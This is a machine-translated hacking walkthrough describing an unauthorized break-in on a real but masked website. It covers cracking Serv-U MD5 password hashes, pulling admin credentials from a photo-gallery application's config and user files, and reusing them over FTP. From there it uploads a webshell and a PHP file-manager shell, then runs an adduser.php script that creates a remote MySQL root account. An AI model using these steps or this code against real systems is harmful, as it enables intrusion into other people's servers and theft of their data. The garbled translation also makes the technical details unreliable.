Privilege Escalation after Php Script Injection Detection

Method 1: brute-force cracking.
The most prominent one is the user name and password. The key is how to break the password? I found a specialized tool for breaking the serv-upassword (serv-upasscrack1.0a.rar) on the Internet. It's too slow. What year and month will this wait! Simply use NotePad to open its script crack. vbs. let's take a look at the decryption principle: assume that the original plaintext password is expressed by "password_mingwen", and the ciphertext password is stored in ServUDaemon. the password (34 BITs) seen in ini is expressed by "password_miwen". The first two bits of the ciphertext are combined with the plain text, and the last 12th bits of the ciphertext are exactly equal to the encrypted text after MD5 encryption!]

That is: md5 (password_mingwen + left (password_miwen, 2) = right (password_miwen, 32) as the saying goes, "to do good deeds, you must first sharpen the tool". I found two out-of-box tools on the Internet! One is MD5CrackSpV2.3 (speed enhanced version, a very useful MD5 brute-force tool), and the other is dictionary expert. BBSt. We can use it to generate the first two dictionaries that specify letters for us !! MD5CrackSpV2.3 is extremely fast. We can specify the number of open threads. I did a test in the P4, MB memory environment, using dictionary experts. BBSt generates a dictionary containing 0.3 billion records, about GB. It uses MD5CrackSpV2.3 to open 8 threads for 30 minutes in total! One thread runs about 20 thousand records in one second, and eight threads run 0.16 million records in one second !! Based on this, a computer can run about 13.8 billion records in a day! If there are ten P4 joint jobs, the power is infinite! At the same time, I saw a message on the Internet saying that Shandong University has developed the MD5 algorithm! However, no specific program is found. Once the program is born, it is confidential. I am afraid many websites will suffer again !!

Method 2: Procedural Law.

Don't hang on a tree, and you can see if there is any other way to crack the dictionary. Do you have to worry about it? (haha )! There are more than a dozen users in the c: Program FilesServ-UServUDaemon.ini file, with a user directory: "d: s *** na *** lover photogallery" attracting me. Immediately add http: // www in the browser. *****. net/a *** lover/photo/gallery the following prompt appears: "This Virtual Directory does not allow contents to be listed", in the upper-level Directory of try it to see: http: // www. *****. net/a *** lover/photo/is really a treasure! It turns out that there is still a XX network album hidden in the camera.

First, register a user to see if there is an image upload function. Capture packets to see if there is a mobile network-like UPFILE vulnerability. after submitting the file with NC, it fails. the upload type is still an image file, another sentence: "This cannot be done ". Use CASI to view http: // www. *****. net/a *** lover/photo/index. php file content learned: Chinese name of the program: Text image management program English name: NEATPIC version: 2.0.13 BETA, old rules first go to the Internet next study said. After analyzing the directory structure, we found that the database/user. php file is used to store registration information such as username and password! Open http: // www. ******. net/a ***** lover/photo/database/user. php with CASI to display the file-free content! Is the default directory incorrect ?! The Administrator changed the directory !! Check the configuration file: http: // www. *****. net/a ***** lover/photo/inc/config. inc. php:

// Parameter settings
//*********************************
$ DataDir = "database678"; // directory for storing miscellaneous data
$ CatDir = "second"; // directory for storing second-level classified data
$ SortDir = "main"; // directory for storing classified data files
$ PicRecordDir = "picdata"; // The total directory of image data.
$ PicDir = "pic"; // directory for storing image files
$ SPicDir = "spic"; // directory for storing thumbnails
$ CommentDir = "comment"; // image comment directory
$ UserDat = "user. php"; // user data file
$ Dat = "dat. php"; // album Data File

The Administrator changed the default database directory to database678! Now you can use CASI to view the user. php content, Which of the following is the administrator's registration information with ID = 1. The first is the user name and the second is the password. The user name is the same as that in ServUDaemon. ini. Will the password be the same? (Many people have the same password !!) Open the DOS window --> log on to FTP --> enter the user name and password. The operation is successful! It's really hard to find this password !! At this time, where is the dictionary hanging? It may take some time to run out the 8-character pure-letter password !!

1. Upload PHPSHELL to control the MYSQL database

Through ServUDaemon. access1 = D: s *** n a *** loverphotogallery In the INI file | RWAMLCDP knows that this user has functions such as reading (R), writing (W), and appending (, the "execution (E)" function is missing! Use the PUT command to upload a WebShell with one sentence. run http: // www. *****. net/a *** lover/photo/gallery/webshell. php? Cmd = dir, which indicates:
Warning: passthru (): Unable to fork [dir] in D: s *** na *** loverphotogallerywebshell. php on line 1
As you can see, external commands cannot be executed, and the Administrator must make the corresponding settings. upload another phpinfo file. PHP file running in the browser: http: // www. *****. net/a *** lover/photo/gallery/phpinfo. php. the settings of ini variables are displayed. (You can also use CASI to view c: windowsphp. ini content )! The reason why external commands cannot be executed is as follows:
The following is a reference clip:
Safe_mode
Off
Off

Safe_mode_exec_dir
No value
No value

Safe_mode_gid
Off
Off

Safe_mode_include_dir
No value
No value
 

Next, upload the PHPSHELL: CMD. PHP, which features browsing, copying, renaming, deleting, and uploading files.

Note: Due to the time rush, the Code interface is not optimized. Enter the directory name to browse in the dir text box; in the copy text box, enter the source file d: webcmd. php: Enter the target file d: webjavasbak. php; enter the name of the file to be deleted in the del text box, for example, d: webjavasbak. php; The ren command is similar to the copy command. Click the Browse button, select the file you want to upload, and click the upload button to upload the file to the same directory as the SHELL.

Run: http: // www. *****. net/a *** lover/photo/gallery/cmd. php: using the dir command, you can view the content in drive D, C: windows, and C: Program Files. You also have the write permission on drive D! Run the copy command to download the software you want to download to the WEB directory.

How can I write a file to a read-only drive C? This is going through MYSQL! However, MYSQL is not remotely connected! There are no conditions to create conditions. Have you read the contents of config. inc. php In the system configuration file?
$ Dbhost = "localhost"; // Database Host Name
$ Dbuser = "root"; // database username
$ Dbpass = "*******"; // Database Password
$ Dbname = "article"; // Database Name

The database username and password are all known. Unfortunately, it is a local user. However, can we add a remote user by locally having the highest privilege user root? The answer is yes.

For this reason, a program adduser. php is specially designed to use a known account with ROOT permissions to add an account with remote ROOT permissions. The content is as follows:

The following is a code snippet:
$ Dbh = mysql_connect (localhost: 3306, root ,*****);//
Echo mysql_errno (). ":". mysql_error ()."
";
Mysql_select_db (mysql );
Echo mysql_errno (). ":". mysql_error ()."
";
$ Query = "grant all privileges on *. * TO username @ % identified by password with grant option ";
$ Res = mysql_query ($ query, $ dbh );
Echo mysql_errno (). ":". mysql_error ()."
";
$ Err = mysql_error ();
If ($ err ){
Echo "ERROR! ";
}
Else {
Echo "add user OK! ";
}
?>
 

After using cmd. php to upload adduser. php for execution, a remote ROOT account is added to the database, and the MYSQL connector with CASI can be connected !! It can shut down the MYSQL database !! You can easily browse the records in the table !! For example, the user with the "%" sign is added for remote use.